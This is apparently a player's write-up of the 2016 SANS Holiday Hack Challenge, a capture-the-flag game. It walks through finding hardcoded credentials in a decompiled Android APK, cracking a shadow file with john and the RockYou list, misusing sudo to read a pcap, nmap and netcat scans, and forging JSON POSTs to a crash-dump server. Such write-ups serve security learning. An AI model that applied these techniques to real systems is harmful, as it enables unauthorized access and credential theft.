Challenger: GilGrenade
Santa's business card reveals usernames for his Twitter and Instagram social media sites.
Create Twitter app:
Download Adam Bertram's MyTwitter PowerShell module to get all of Santa's tweets
Use New-MyTwitterConfiguration to store the Twitter API secrets from your Twitter app in your registry.
Modify MyTwitter to add a 'MaxID' parameter to Get-TweetTimeline:
# Add to param() block [Parameter()] $MaxID = $null
# Replace $ApiParams with the following: if ($MaxID) { $ApiParams = @{ 'include_rts' = @{ $true = 'true';$false = 'false' }[$IncludeRetweets -eq $true] 'exclude_replies' = @{ $true = 'false'; $false = 'true' }[$IncludeReplies -eq $true] 'count' = $MaximumTweets 'screen_name' = $Username 'max_id' = $MaxID } } else { $ApiParams = @{ 'include_rts' = @{ $true = 'true';$false = 'false' }[$IncludeRetweets -eq $true] 'exclude_replies' = @{ $true = 'false'; $false = 'true' }[$IncludeReplies -eq $true] 'count' = $MaximumTweets 'screen_name' = $Username } }
Get all the tweets:
$tweets = @() Get-TweetTimeline -Username santawclaus -MaximumTweets 200 | %{$tweets += $_} $lastid = ($tweets | select -last 1 id).id Get-TweetTimeline -Username santawclaus -MaximumTweets 200 -MaxID ($lastid - 1) | %{$tweets += $_}
Write all the tweets to the console to see the secret message:
$tweets | select text
Secret message is bugbounty.
- Go to in Chrome.
- Click the picture containing the laptop, tools, etc.
- Open the developer tools with F12, and click the Sources tab.
- Find the larger version of the image, right-click, and click "Open in a new tab".
- Notice the console window says "".
- Notice the top of the nmap report on the far right says "".
- Download
- Extract SantaGram_4.2.apk from using password 'bugbounty'
The secret message is bugbounty.
The ZIP file contains an Android APK called SantaGram_4.2.apk.
- Change the extension of SantaGram_4.2.apk to .zip and extract the files.
- Find the audio file in ./res/raw/discombobulatedaudio1.mp3
- Listen to it and think "That's weird."
- Go to
- From extracted files above, upload ./classes.dex
- Save the result.
- Extract the saved zip to a folder.
- Open the extracted folder in VS Code.
- Use the "Find in Folder" feature to search for string "password"
- In ./com/northpolewonderland/santagram/ you will find password is busyreindeer78
- Now search for string "username" and find username guest
The embedded username and password are guest:busyreindeer78.
The audio file is named discombobulatedaudio1.mp3.
Follow Josh Wright's blog post to mount the Cranbian image:
Use Linux fdisk tool to find the sector start of cranbian-jessie.img's Linux partition (cranbian-jess.img2):
fdisk -l cranbian-jessie.img Device Boot Start End Blocks Id System cranbian-jessie.img1 8192 137215 64512 c W95 FAT32 (LBA) cranbian-jessie.img2 137216 2713599 1288192 83 Linux
Multiply the start sector by 512, and mount to a directory called 'cpi':
echo $((512*137216)) 70254592 mkdir cpi sudo mount -v -o offset=70254592 -t ext4 cranbian-jessie.img cpi/
Download the and decompress RockYou word list:
bizip2 -d rockyou.txt.bz2
Use 'john' tool to crack passwords using the RockYou word list:
sudo ./john --wordlist=rockyou.txt ~/cpi/etc/shadow
The password is yummycookies.
Execute the wumpus game.
Move through the cave until you smell a Wumpus.
Shoot in all directions until you hit the Wumpus.
Check permissions of the pcap file:
ls -l /out.pcap -r-------- 1 itchy itchy 1087929 Dec 2 15:05 out.pcap
Note: You are logged in as scratchy, and only itchy has permission to read out.pcap.
Check scratchy's sudo permissions:
sudo -l Matching Defaults entries for scratchy on df74bc5b1761: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin User scratchy may run the following commands on df74bc5b1761: (itchy) NOPASSWD: /usr/sbin/tcpdump (itchy) NOPASSWD: /usr/bin/strings
Use strings to view the contents of the pcap file:
sudo -u itchy strings /out.pcapls
Look for the <input> element named 'part1' and take note of the value santasli:
sudo -u itch strings /out.pcap | grep part1
- Guess the rest of the passphrase is ttlehelper.
Use 'find' to list all directories recusively:
find . -type d -links 2
Make note of the interesting paths revealed in elf's home folder:
./home/elf/.doormat/. / /\/\\/Don't Look Here!/You are persistent, aren't you?/' ./home/elf/.doormat/. / /\/\\/Don't Look Here!/You are persistent, aren't you?/cookbook ./home/elf/.doormat/. / /\/\\/Don't Look Here!/You are persistent, aren't you?/temp ./home/elf/.doormat/. / /\/\\/Don't Look Here!/secret ./home/elf/.doormat/. / /\/\\/Don't Look Here!/files ./home/elf/.doormat/. / /\/\\/holiday ./home/elf/.doormat/. / /\/\\/temp ./home/elf/.doormat/. / /\/santa ./home/elf/.doormat/. / /\/ls ./home/elf/.doormat/. / /opt ./home/elf/.doormat/. / /var ./home/elf/.doormat/. /bin ./home/elf/.doormat/. /not_here
cd to the deepest one (It's tricky!), and read the file inside.
cd ~/.doormat cd ". " cd \\ cd \\\\ cd "Don't Look Here!" cd "You are persistent, aren't you?" cd \' cat key_for_the_door.txt key: open_sesame
Note the passphrase open_sesame.
Look-up Wargames YouTube clips, and respond to prompts like Matthew Broderick:
GREETINGS PROFESSOR FALKEN. Hello. HOW ARE YOU FEELING TODAY? I'm fine. How are you? EXCELLENT...ETC. People sometimes make mistakes. YES THEY DO. SHALL WE PLAY A GAME? Love to. How about Global Thermonuclear War? WOULDN'T YOU PREFER A GOOD GAME OF CHESS? Later. Let's play Global Thermonuclear War. WHICH SIDE DO YOU WANT? 2 PLEASE LIST PRIMARY TARGETS. Las Vegas
Note the passphrase LOOK AT THE PRETTY LIGHTS.
Type 'HELP' to view the help file.
Press 'l' to enter LESS commands.
List files in the current directory:
Execute ActivateTrain
Press 'Enter' to travel to 1978.
See Part 5
The "cranpi" account's password is yummycookies
See above for how each terminal door was opened. Santa was imprisoned in 1978's Dungeon For Errant Reindeer (DFER).
Use strings to see if there is anything interesting:
strings dungeon | more
Find text from GDT output (not knowing GDT is a thing).
Google 'Zork cheats' and find nothing.
Type random things from strings output in game to see if they do anything, and find out GDT is a thing.
Use the GDT 'Display' commands in game to get tables of all rooms and objects (trial and error with Limits):
./dungeon >gtd GDT>he <list of valid commands> GDT>do Limits: 1 217 <list of all objects> GDT>dr Limits: 1 192 <list of all rooms>
Looking at objects table for 'human-size' objects, realize object 39 does not end up in inventory when you take it. This is you!
Use the GDT 'Alter HERE' command to move yourself to a different room, realizing the work you did in step 6 is meaningless. Assuming special rooms would be last in the index, jump to 192 and exit GDT:
GDT>ah Old= 2 New= 192 GDT>ex
Going back to your objects table from step 5, look for objects that are not containers and not size 1000, and take them with GDT:
GDT>tk Entry: 6 Taken. GDT>ex
Give the elf the jade figurine and receive the hint 'Try the online version for the true prize.'
Guess the dungeon server is at
Ping and confirm with Oracle Hessman.
Scan the with nmap using the -sC switch the elf told you about, and the other options in the 'man nmap' example:
nmap -A -sC -T4
Discover port 1111 is listening, and contains the Dungeon opening text.
Use Netcat to connect to dungeon online.
nc 11111
Repeat the GDT tricks above to get another hint from the online elf.
Email [email protected] for the Dungeon audio file.
Receive an email with discombobulatedaudio3.mp3 attached.
- dungeon.northpolewonderland was easy, so try pinging
- Bingo! Confirm with Oracle Hessman.
- Browse to, and login with credentials from the APK:
- Username: guest
- Password: busyreindeer78
- Click MP3 at the top to download the discombobulatedaudio2.mp3 file.
Download apktool.
With help from Joshua Wright's Manipulating Android Applications video ( generate smali files from APK:
apktool.bat -d SantaGram_4.2.apk
Using PowerShell, search XML resources for the string 'debug'
cd .\SantaGram_4.2\res Get-ChildItem -Recurse | Select-String 'debug'
values\public.xml:505: <public type="string" name="debug_data_collection_url" id="0x7f07001d" /> values\public.xml:506: <public type="string" name="debug_data_enabled" id="0x7f07001e" /> values\strings.xml:32: <string name="debug_data_collection_url"></string> values\strings.xml:33: <string name="debug_data_enabled">false</string>
Note the URL
Ping, and confrim with Oracle Hessman.
Edit line 33 of strings.xml to set "debug_data_enabled" to true.
<string name="debug_data_enabled">true</string>
Rebuild the application:
apktool.bat b .\SantaGram_4.2
Sign the new apk file:
mkdir keys keytool.exe -genkey -v .\SantaGram_4.2\keys\santagram.keystore -alias SantaGram -keyalg RSA -keysize 1024 -sigalg SHA1withRSA -validity 10000 jarsigner.exe -sigalg SHA1withRSA -keystore .\SantaGram_4.2\keys\santagram.keystore .\SantaGram_4.2\dist\SantaGram_4.2.apk SantaGram
Open Burp Suite and launch emulator specifying the Burp proxy in the -http-proxy parameter:
emulator.exe -avd Nexus711 -http-proxy
Open SantaGram, and use the app until you notice a POST to (Edit Profile).
Notice in the response's JSON the key verbose with value false.
Use Invoke-Webrequest to send a new request adding the following key/value:
$hash = @{ date="20161225000000-0500" udid="385340c77e1f207b" debug="com.northpolewonderland.santagram.EditProfile, EditProfile" freemem=67082544 verbose=$true } Invoke-Webrequest -Uri ` -Method POST ` -ContentType 'application/json' ` -Body (ConvertTo-Json $hash) | select -exp Content
Note the response contains a JSON key named "files" with an array of values. The first item in the array is debug-20161224235959-0.mp3.
Use PowerShell to search SantaGram APK's XML resources for 'http'
cd .\SantaGram_4.2\res Get-ChildItem -Recurse | Select-String 'http'
values\strings.xml:25: <string name="analytics_usage_url"></string> values\strings.xml:29: <string name="banner_ad_url"></string> values\strings.xml:32: <string name="debug_data_collection_url"></string> values\strings.xml:34: <string name="dungeon_url"></string> values\strings.xml:35: <string name="exhandler_url"></string>
Note the URL
Ping, and confirm with Oracle Hessman.
Install Tampermonkey in Chrome.
Following instructions from, and use the Meteor Miner script to explore the ad server.
Notice the /admin/quotes route, and follow it.
Open Chrome Developer Tools by pressing F12, and click the Console tab.
Use the console to view the HomeQuotes records in /admin/quotes:
Expand the array, then expand the fourth object, and note the path of the audio field /ofdAR4UYRaeNxMg/discombobulatedaudio5.mp3
Download the audio file from
- Using output from 'Discover banner ad server', note the URL
- Ping, and confirm with Oracle Hessman.
Browse to and note the message "Request method must be POST."
Use Invoke-Webrequest to send a POST request.
Invoke-Webrequest -Uri -Method POST
Note the response states "Content type must be: application/json," and try again.
Invoke-Webrequest -Uri ` -Method POST ` -ContentType 'application/json' ` -Body '{"key":"value"}'
Note the response states "JSON key 'operation' must be set to WriteCrashDump or ReadCrashDump," and try again.
Invoke-Webrequest -Uri ` -Method POST ` -ContentType 'application/json' ` -Body '{"operation":"WriteCrashDump"}'
Note the repsones states "JSON key 'data' must be set," and try again.
Invoke-Webrequest -Uri ` -Method POST ` -ContentType 'application/json' ` -Body '{"operation":"WriteCrashDump","data":"somedata"}'
Receive the following JSON response:
{ "success" : true, "folder" : "docs", "crashdump" : "crashdump-KVeuKT.php" }
Now try to read the crashdump:
Invoke-Webrequest -Uri ` -Method POST ` -ContentType 'application/json' ` -Body '{"operation":"ReadCrashDump","crashdump":"crashdump-KVeuKT"}'
Note the response states "JSON key 'data' must be set," and try again using 'data' in place of the 'crashdump' key.
Invoke-Webrequest -Uri ` -Method POST ` -ContentType 'application/json' ` -Body '{"operation":"ReadCrashDump","data":"crashdump-KVeuKT"}'
Note the response states "JSON key 'crashdump' must be set," and try again putting the 'crashdump' key inside the 'data' key.
Invoke-Webrequest -Uri ` -Method POST ` -ContentType 'application/json' ` -Body '{"operation":"ReadCrashDump","data":{"crashdump":"crashdump-KVeuKT"}}'
Jump for joy when you see "somedata" in the response!
Struggle for days trying to figure out what to write and read, while referencing the following blog post hundreds of times:
Give up.
See above for how each server was compromised, and audio obtained.
- Mobile Analytics Server Part 1: discombobulatedaudio2.mp3
- Dungeon Game: discombobulatedaudio3.mp3
- Debug Server: debug-20161224235959-0.mp3
- Banner Ad Server: discombobulatedaudio5
- Unhandled Exception Server: ???
- Mobile Analytics Server Part 2: ???
- Open Audacity, and concatenate all audio files in order.
- Click Effect and then click Change Tempo.
- Change the length to around 3 seconds.
- Guess the beginning of the passphrase is as follows: "Merry Christmas, Santa Claus, or as I would..."
- Never figure out the rest.
I don't know. I could not figure out the passphrase for the last door.